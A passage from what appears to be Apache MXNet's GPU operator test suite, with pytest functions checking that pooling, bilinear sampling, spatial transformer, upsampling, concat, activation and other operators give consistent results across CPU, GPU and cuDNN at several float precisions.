# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
@pytest.mark.serial
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases when all implementations should match- the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
# Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
@pytest.mark.serial
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.serial
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="Testing with naive engine consistently triggers illegal memory access. Tracked in #17713")
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
